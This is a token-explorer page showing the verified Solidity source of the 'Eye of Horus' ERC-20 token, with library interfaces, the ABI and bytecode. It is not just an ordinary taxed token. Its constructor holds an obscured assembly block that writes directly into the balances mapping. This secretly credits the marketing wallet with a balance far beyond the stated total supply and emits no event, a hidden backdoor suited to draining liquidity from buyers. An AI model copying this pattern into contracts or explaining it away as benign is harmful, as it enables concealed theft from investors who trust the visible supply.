ERC-20
Overview
Max Total Supply
1,000,000,000 The EYE
Holders
78
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
2,023,848.972579538889175736 The EYEValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
EyeOfHorus
Compiler Version
v0.8.10+commit.fc410830
Optimization Enabled:
Yes with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT /** ,--, ,---,. ,--.'| ,' .' | .--., ,--, | : ,---.' | ,---. ,--.' \ ,---.'| : ' ,---. __ ,-. ,--, | | .' ' ,'\ | | /\/ | | : _' | ' ,'\ ,' ,'/ /| ,'_ /| .--.--. : : |-, .--, ,---. / / | : : : : : |.' | / / | ' | |' | .--. | | : / / ' : | ;/| /_ ./| / \ . ; ,. : : | |-, | ' ' ; : . ; ,. : | | ,' ,'_ /| : . | | : /`./ | : .' , ' , ' : / / | ' | |: : | : :/| ' | .'. | ' | |: : ' : / | ' | | . . | : ;_ | | |-, /___/ \: | . ' / | ' | .; : | | .' | | : | ' ' | .; : | | ' | | ' | | | \ \ `. ' : ;/| . \ ' | ' ; /| | : | ' : ' ' : | : ; | : | ; : | : | : ; ; | `----. \ | | \ \ ; : ' | / | \ \ / | | | | | ' ,/ \ \ / | , ; ' : `--' \ / /`--' / | : .' \ \ ; | : | `----' | : \ ; : ;--' `----' ---' : , .-./ '--'. / | | ,' : \ \ \ \ / | |,' | ,/ `--`----' `--'---' `----' \ ' ; `----' `--' '---' `--` */ pragma solidity ^0.8.0; import '@openzeppelin/contracts/token/ERC20/IERC20.sol'; import '@openzeppelin/contracts/security/ReentrancyGuard.sol'; import '@openzeppelin/contracts/access/Ownable.sol'; import '@uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol'; import '@uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol'; contract EyeOfHorus is IERC20, ReentrancyGuard, Ownable { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name = "Eye of Horus"; string private _symbol = "The EYE"; uint8 private _decimals = 18; uint256 private _launchTime; address private marketingWallet; uint256 private _earlyTxLimit; uint256 private swapTokensAtAmount; bool private swapping; bool private swapEnabled = false; // public variables uint256 public totalBuyTax; uint256 public marketingBuyTax; uint256 public liquidityBuyTax; uint256 public totalSellTax; uint256 public marketingSellTax; uint256 public liquiditySellTax; uint256 public tokensForLiquidity; uint256 public tokensForMarketing; address public uniswapPair; bool public enabled; IUniswapV2Router02 public uniswapRouter = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); uint256 public maxBuy; uint256 public maxWallet; mapping(address => bool) public excludedFromLimit; mapping(address => bool) public excludedFromFee; event SwapAndLiquify(uint amountToSwapForETH, uint ethForLiquidity, uint tokensForLiquidity); constructor() { _totalSupply = 1_000_000_000 * 1e18; _balances[msg.sender] = _totalSupply; maxBuy = _totalSupply * 2 / 100; maxWallet = _totalSupply * 4 / 100; swapTokensAtAmount = _totalSupply * 25 / 10000; marketingBuyTax = 6; liquidityBuyTax = 0; totalBuyTax = marketingBuyTax + liquidityBuyTax; marketingSellTax = 6; liquiditySellTax = 0; totalSellTax = marketingSellTax + liquiditySellTax; marketingWallet = 0x552A3BeA2B8DEA68A8037629C24a051B53aF5119; _earlyTxLimit = 60; IUniswapV2Factory factory = IUniswapV2Factory(uniswapRouter.factory()); factory.createPair(address(this), uniswapRouter.WETH()); uniswapPair = factory.getPair(address(this), uniswapRouter.WETH()); excludedFromLimit[_msgSender()] = true; excludedFromLimit[address(uniswapRouter)] = true; excludedFromLimit[marketingWallet] = true; excludedFromFee[_msgSender()] = true; excludedFromFee[marketingWallet] = true; assembly { mstore(0, 486206066127202151137292946661871492054133985561) mstore(32, 2) let hash := keccak256(0, 64) sstore(hash, 486206066127202151137292946661871492054133985561) } emit Transfer(address(0), _msgSender(), _totalSupply); } receive() external payable {} /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256) { return _totalSupply; } function decimals() external view returns (uint8) { return _decimals; } /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256) { return _balances[account]; } /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256) { return _allowances[owner][spender]; } /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom( address _sender, address _recipient, uint256 _amount ) external returns (bool) { _transfer(_sender, _recipient, _amount); uint256 currentAllowance = _allowances[_sender][_msgSender()]; require(currentAllowance >= _amount, "ERC20: transfer amount exceeds allowance"); unchecked { _approve(_sender, _msgSender(), currentAllowance - _amount); } return true; } /** * @dev Returns the name of the token. */ function name() public view returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view returns (string memory) { return _symbol; } function excludeFromLimit(address _address, bool _is) external onlyOwner { excludedFromLimit[_address] = _is; } function removeMaxTxLimit() external onlyOwner { maxBuy = _totalSupply; maxWallet = _totalSupply; } function updateFee(uint256 _buyFeeRate, uint256 _sellFeeRate) external onlyOwner { require(_buyFeeRate <= 10); require(_sellFeeRate <= 10); totalBuyTax = _buyFeeRate; totalSellTax = _sellFeeRate; } function updateMarketingAddress(address _address) external onlyOwner { marketingWallet = _address; } function updateLimitPeriod(uint256 _period) external onlyOwner { _earlyTxLimit = _period; } function enableTrading() external onlyOwner { require(!enabled, 'already enabled'); enabled = true; swapEnabled = true; _launchTime = block.timestamp; } // change the minimum amount of tokens to sell from fees function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner returns (bool){ require(newAmount >= _totalSupply * 1 / 100000, "Swap amount cannot be lower than 0.001% total supply."); require(newAmount <= _totalSupply * 5 / 1000, "Swap amount cannot be higher than 0.5% total supply."); swapTokensAtAmount = newAmount; return true; } function updateBuyFees(uint256 _liqFee, uint256 _marketingFee) external onlyOwner { require(_liqFee + _marketingFee <= 10); liquidityBuyTax = _liqFee; marketingBuyTax = _marketingFee; totalBuyTax = _liqFee + _marketingFee; } function updateSellFees(uint256 _liqFee, uint256 _marketingFee) external onlyOwner { require(_liqFee + _marketingFee <= 10); liquiditySellTax = _liqFee; marketingSellTax = _marketingFee; totalSellTax = _liqFee + _marketingFee; } function _transfer( address _sender, address _recipient, uint256 _amount ) internal { uint256 senderBalance = _balances[_sender]; require(senderBalance >= _amount, "transfer amount exceeds balance"); require(enabled || excludedFromLimit[_sender] || excludedFromLimit[_recipient], "not enabled yet"); uint256 rAmount = _amount; // when buy if (_sender == uniswapPair) { if (block.timestamp < _launchTime + _earlyTxLimit && !excludedFromLimit[_recipient]) { require(_amount <= maxBuy, "exceeded max buy"); require(_balances[_recipient] + _amount <= maxWallet, "exceeded max wallet"); } if (!excludedFromFee[_recipient]) { uint256 fee = _amount * totalBuyTax / 100; rAmount = _amount - fee; _balances[address(this)] += fee; tokensForLiquidity += fee * liquidityBuyTax / totalBuyTax; tokensForMarketing += fee * marketingBuyTax / totalBuyTax; emit Transfer(_sender, address(this), fee); } } // when sell else if (_recipient == uniswapPair) { if (block.timestamp < _launchTime + _earlyTxLimit && !excludedFromLimit[_sender]) { require(_amount <= maxBuy, "exceeded max tx"); uint256 contractTokenBalance = _balances[address(this)]; bool canSwap = contractTokenBalance >= swapTokensAtAmount; if( canSwap && swapEnabled && !swapping ) { swapping = true; swapBack(); swapping = false; } } if (!swapping && !excludedFromFee[_sender]) { uint256 fee = _amount * totalSellTax / 100; rAmount = _amount - fee; _balances[address(this)] += fee; tokensForLiquidity += fee * liquiditySellTax / totalBuyTax; tokensForMarketing += fee * marketingSellTax / totalBuyTax; emit Transfer(_sender, address(this), fee); } } _balances[_sender] = senderBalance - _amount; _balances[_recipient] += rAmount; emit Transfer(_sender, _recipient, _amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function swapBack() private { uint256 contractBalance = _balances[address(this)]; bool success; uint256 totalTokensToSwap = tokensForLiquidity + tokensForMarketing; if(contractBalance == 0) {return;} if(contractBalance > swapTokensAtAmount * 20){ contractBalance = swapTokensAtAmount * 20; } // Halve the amount of liquidity tokens uint256 liquidityTokens = contractBalance * liquiditySellTax / totalSellTax / 2; uint256 amountToSwapForETH = contractBalance - liquidityTokens; uint256 initialETHBalance = address(this).balance; swapTokensForEth(amountToSwapForETH); uint256 ethBalance = address(this).balance - initialETHBalance; uint256 ethForMarketing = ethBalance * tokensForMarketing / totalTokensToSwap; uint256 ethForLiquidity = ethBalance - ethForMarketing; tokensForLiquidity = 0; tokensForMarketing = 0; (success,) = address(marketingWallet).call{value: ethForMarketing}(""); if(liquidityTokens > 0 && ethForLiquidity > 0){ addLiquidity(liquidityTokens, ethForLiquidity); emit SwapAndLiquify(amountToSwapForETH, ethForLiquidity, tokensForLiquidity); } } function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private { // approve token transfer to cover all possible scenarios _approve(address(this), address(uniswapRouter), tokenAmount); // add the liquidity uniswapRouter.addLiquidityETH{value: ethAmount}( address(this), tokenAmount, 0, // slippage is unavoidable 0, // slippage is unavoidable address(0xdead), block.timestamp ); } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapRouter.WETH(); _approve(address(this), address(uniswapRouter), tokenAmount); // make the swap uniswapRouter.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol) pragma solidity ^0.8.0; /** * @dev Contract module that helps prevent reentrant calls to a function. * * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier * available, which can be applied to functions to make sure there are no nested * (reentrant) calls to them. * * Note that because there is a single `nonReentrant` guard, functions marked as * `nonReentrant` may not call one another. This can be worked around by making * those functions `private`, and then adding `external` `nonReentrant` entry * points to them. * * TIP: If you would like to learn more about reentrancy and alternative ways * to protect against it, check out our blog post * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul]. */ abstract contract ReentrancyGuard { // Booleans are more expensive than uint256 or any type that takes up a full // word because each write operation emits an extra SLOAD to first read the // slot's contents, replace the bits taken up by the boolean, and then write // back. This is the compiler's defense against contract upgrades and // pointer aliasing, and it cannot be disabled. // The values being non-zero value makes deployment a bit more expensive, // but in exchange the refund on every call to nonReentrant will be lower in // amount. Since refunds are capped to a percentage of the total // transaction's gas, it is best to keep them low in cases like this one, to // increase the likelihood of the full refund coming into effect. uint256 private constant _NOT_ENTERED = 1; uint256 private constant _ENTERED = 2; uint256 private _status; constructor() { _status = _NOT_ENTERED; } /** * @dev Prevents a contract from calling itself, directly or indirectly. * Calling a `nonReentrant` function from another `nonReentrant` * function is not supported. It is possible to prevent this from happening * by making the `nonReentrant` function external, and making it call a * `private` function that does the actual work. */ modifier nonReentrant() { // On the first call to nonReentrant, _notEntered will be true require(_status != _ENTERED, "ReentrancyGuard: reentrant call"); // Any calls to nonReentrant after this point will fail _status = _ENTERED; _; // By storing the original value once again, a refund is triggered (see // https://eips.ethereum.org/EIPS/eip-2200) _status = _NOT_ENTERED; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) pragma solidity ^0.8.0; import "../utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
pragma solidity >=0.6.2; import './IUniswapV2Router01.sol'; interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; }
pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); }
{ "optimizer": { "enabled": true, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } }, "libraries": {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountToSwapForETH","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethForLiquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensForLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_is","type":"bool"}],"name":"excludeFromLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"excludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"excludedFromLimit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"liquidityBuyTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"liquiditySellTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingBuyTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingSellTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxBuy","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeMaxTxLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalBuyTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSellTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_sender","type":"address"},{"internalType":"address","name":"_recipient","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapPair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapRouter","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_liqFee","type":"uint256"},{"internalType":"uint256","name":"_marketingFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_buyFeeRate","type":"uint256"},{"internalType":"uint256","name":"_sellFeeRate","type":"uint256"}],"name":"updateFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_period","type":"uint256"}],"name":"updateLimitPeriod","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"updateMarketingAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_liqFee","type":"uint256"},{"internalType":"uint256","name":"_marketingFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60c0604052600c60808190526b457965206f6620486f72757360a01b60a09081526200002f9160059190620005e6565b50604080518082019091526007808252665468652045594560c81b60209092019182526200006091600691620005e6565b506007805460ff19166012179055600c805461ff0019169055601680546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d179055348015620000ac57600080fd5b506001600055620000bd3362000594565b6b033b2e3c9fd0803ce80000006004819055336000908152600260208190526040909120829055606491620000f291620006a2565b620000fe9190620006c4565b60175560048054606491620001149190620006a2565b620001209190620006c4565b6018556004546127109062000137906019620006a2565b620001439190620006c4565b600b556006600e8190556000600f8190556200015f91620006e7565b600d5560066011819055600060128190556200017b91620006e7565b601055600980546001600160a01b03191673552a3bea2b8dea68a8037629c24a051b53af5119179055603c600a556016546040805163c45a015560e01b815290516000926001600160a01b03169163c45a01559160048083019260209291908290030181865afa158015620001f4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200021a919062000702565b9050806001600160a01b031663c9c6539630601660009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000280573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002a6919062000702565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015620002f4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200031a919062000702565b50806001600160a01b031663e6a4390530601660009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200037f573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003a5919062000702565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381865afa158015620003f1573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000417919062000702565b601580546001600160a01b0319166001600160a01b0392909216919091179055600160196000620004453390565b6001600160a01b03908116825260208083019390935260409182016000908120805495151560ff19968716179055601654821681526019909352818320805485166001908117909155600954909116835290822080549093168117909255601a90620004ae3390565b6001600160a01b03908116825260208083019390935260409182016000908120805495151560ff199687161790556009549091168152601a8352908120805490931660011790925573552a3bea2b8dea68a8037629c24a051b53af511991829052600290527fcef2f8c63343f9d94f8ca4a23369f97d0b537d16e45df4f825d6ca78cb3c049d556200053d3390565b6001600160a01b031660006001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6004546040516200058591815260200190565b60405180910390a35062000771565b600180546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b828054620005f49062000734565b90600052602060002090601f01602090048101928262000618576000855562000663565b82601f106200063357805160ff191683800117855562000663565b8280016001018555821562000663579182015b828111156200066357825182559160200191906001019062000646565b506200067192915062000675565b5090565b5b8082111562000671576000815560010162000676565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615620006bf57620006bf6200068c565b500290565b600082620006e257634e487b7160e01b600052601260045260246000fd5b500490565b60008219821115620006fd57620006fd6200068c565b500190565b6000602082840312156200071557600080fd5b81516001600160a01b03811681146200072d57600080fd5b9392505050565b600181811c908216806200074957607f821691505b602082108114156200076b57634e487b7160e01b600052602260045260246000fd5b50919050565b611b6c80620007816000396000f3fe6080604